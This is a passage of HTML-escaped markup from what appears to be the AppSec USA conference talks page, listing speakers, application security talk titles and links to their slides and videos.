&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#staaf TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#staaf TARGET="&gt;STAAF: An Efficient Distributed Framework for Performing Large-Scale Android Application Analysis&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/staaf.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Charles Henderson&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#gsr TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#gsr TARGET="&gt;Global Security Report&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/gsr.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Shreeraj Shah&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#nextgen TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#nextgen TARGET="&gt;Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/nextgen.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Scott Matsumoto&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#tmcloud TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#tmcloud TARGET="&gt;Threat Modeling in the Cloud: What You Don’t Know Will Hurt You!&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/tmcloud.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Tom Fischer&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#aspnetlessons TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#aspnetlessons TARGET="&gt;Lessons Learned Building Secure ASP.NET Applications&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/aspnetlessons.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
John Benninghoff&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#bsm TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#bsm TARGET="&gt;Behavioral Security Modeling: Eliminating Vulnerabilities by Building Predictable Systems&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/bsm.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Michael Coates (&lt;a _blank"="" href="http://www.ustream.tv/recorded/17436677%20TARGET="&gt;Video&lt;/a&gt;, &lt;a _blank"="" href="http://www.appsecusa.org/p/board.pdf%20TARGET="&gt;PDF&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Juan Galiana Lara&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#pwn TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#pwn TARGET="&gt;Pwning intranets with HTML5&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/pwn.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Dan Cornell&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#heal TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#heal TARGET="&gt;The Self Healing Cloud: Protecting Applications and Infrastructure with Automated Virtual Patching&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/heal.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Mike Park&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#open TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#open TARGET="&gt;Android Security, or This is not the Kind of "Open" I Meant...&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/open.pptx%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Mike McCormick, Christophe Veltsos, Jeff Williams&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#makingit TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#makingit TARGET="&gt;Making it in Information Security and Application Security&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/makingit.ppt%20TARGET="&gt;PPT&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Todd Redfoot&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#keepingup TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#keepingup TARGET="&gt;Keeping up with the Web-Application Security&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/keepingup.pptx%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Matt Tesauro&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#skyfalling TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#skyfalling TARGET="&gt;Testing from the Cloud: Is the Sky Falling?&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/skyfalling.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Kevin Stadmeyer, Garrett Held&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#ios TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#ios TARGET="&gt;Hacking (and Defending) iPhone Applications&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/ios.pptx%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
John B. Dickson, CISSP&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#okgoodenough TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#okgoodenough TARGET="&gt;Software Security: Is OK Good Enough?&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/okgoodenough.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Jon McCoy (DigitalBodyGuard)&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#blackarts TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#blackarts TARGET="&gt;Hacking .NET (C#) Applications: The Black Arts&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/blackarts.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Adrian Lane&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#cloudsec TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#cloudsec TARGET="&gt;CloudSec 12-Step&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/cloudsec.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Ashkan Soltani, Gerrit Padgham&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#zombies TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#zombies TARGET="&gt;When Zombies Attack - a Tracking Love Story&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/zombies.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Jeff Williams&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#inception TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#inception TARGET="&gt;AppSec Inception - Exploiting Software Culture&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://prezi.com/eagnlq5a00_d/appsec-inception-exploiting-the-software-ecosystem-appsec/%20TARGET="&gt;Prezi [Flash]&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a _blank"="" href="http://www.appsecusa.org/edu_ctf.html%20TARGET="&gt;UNIVERSITY CHALLENGE&lt;/a&gt; WINNERS TALK! (&lt;a _blank"="" href="http://www.ustream.tv/recorded/17440089%20TARGET="&gt;Video&lt;/a&gt;, &lt;a _blank"="" href="http://www.appsecusa.org/p/edu_ctf.ppt%20TARGET="&gt;PPT&lt;/a&gt;) &lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Ira Winkler (&lt;a _blank"="" href="http://www.ustream.tv/recorded/17453238%20TARGET="&gt;Video&lt;/a&gt;, &lt;a _blank"="" href="http://www.appsecusa.org/p/winkler.ppt%20TARGET="&gt;PPT&lt;/a&gt;) &lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Richard Struse&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#swacycle TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#swacycle TARGET="&gt;Software Assurance Automation throughout the Lifecycle&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/swacycle.pptx%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Michael Coates&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#cheatsheets TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#cheatsheets TARGET="&gt;Pure AppSec, No Fillers or Preservatives - OWASP Cheat Sheet Series&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/cheatsheets.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Colin Watson&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#codesofconduct TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#codesofconduct TARGET="&gt;OWASP Codes of Conduct&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/codesofconduct.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Dr. Bill Chu, Jing Xie&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#ide TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#ide TARGET="&gt;Secure Programming Support in IDE&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/ide.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Brian Chess&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#graynewblack TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#graynewblack TARGET="&gt;Gray, the New Black: Gray-Box Web Penetration Testing&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/graynewblack.pptx%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Ryan Stinson&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#capeccwe TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#capeccwe TARGET="&gt;Improve your SDLC with CAPEC and CWE&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/capeccwe.pptx%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Jack Mannino, Zach Lanier, Mike Zusman&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#mobiletopten TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#mobiletopten TARGET="&gt;OWASP Mobile Top 10 Risks&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/mobiletopten.pptx%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Aditya K Sood, Richard Enbody&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#goodhacker TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#goodhacker TARGET="&gt;The Good Hacker - Dismantling Web Malware&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/goodhacker.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Chris Wysopal&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#debt TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#debt TARGET="&gt;Application Security Debt and Application Interest Rates&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/debt.ppt%20TARGET="&gt;PPT&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Chuck Willis, Kris Britton&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#nsacas TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#nsacas TARGET="&gt;Sticking to the Facts: Scientific Study of Static Analysis Tools&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/nsacas.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Simon Bennetts&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#zap TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#zap TARGET="&gt;Introducing the OWASP Zed Attack Proxy&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/zap.pptx%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Justin Collins, Tin Zaw&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#brakemanandjenkins TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#brakemanandjenkins TARGET="&gt;Brakeman and Jenkins: The Duo Detect Defects in Ruby on Rails Code&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/brakemanandjenkins.pptx%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Mike Ware&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#simplifyingthreatmodeling TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#simplifyingthreatmodeling TARGET="&gt;Simplifying Threat Modeling&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/simplifyingthreatmodeling.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Moxie Marlinspike (&lt;a _blank"="" href="http://www.ustream.tv/recorded/17457016%20TARGET="&gt;Video&lt;/a&gt;, &lt;a _blank"="" href="http://www.appsecusa.org/p/authenticity.pdf%20TARGET="&gt;PDF&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Adam Meyers&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#mobileswa TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#mobileswa TARGET="&gt;Mobile Applications Software Assurance&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/mobileswa.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Anthony J. Stieber&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#crypto TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#crypto TARGET="&gt;How NOT to Implement Cryptography for the OWASP Top 10&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/crypto.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Michael Coates&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#bounty TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#bounty TARGET="&gt;Security Evolution - Bug Bounty Programs for Web Applications&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/bounty.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Wendy Nather (moderator), Dinis Cruz, Chris Eng, Jerry Hoff, Darren Meyer, John Steven, Sean Fay&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#gofaster TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#gofaster TARGET="&gt;Speeding Up Security Testing Panel&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/gofaster.pptx%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Charles Schmidt&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#scap TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#scap TARGET="&gt;You’re Not Done (Yet) - Turning Securable Apps into Secure Installations using SCAP&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/scap.pptx%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Beef (Chris Schmidt), Kevin Wall&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#esapi2 TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#esapi2 TARGET="&gt;ESAPI 2.0 - Defense Against the Dark Arts&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/esapi2.ppt%20TARGET="&gt;PPT&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Jason Li&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#projectsportal TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#projectsportal TARGET="&gt;OWASP Projects Portal Launch! (5-10 Minutes)&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/projectsportal.pptx%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Srini Penchikala&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#omq TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#omq TARGET="&gt;Messaging Security using GlassFish 3.1 and Open Message Queue&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/omq.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Glenn Leifheit (moderator), Andreas Fuchsberger, Ajoy Kumar, Richard Tychansky, Alessandro Moretti&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#isc2 TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#isc2 TARGET="&gt;Application Security Advisory Board SDLC Panel&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/isc2.pptx%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Michelle Moss, Nadya Bartol&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
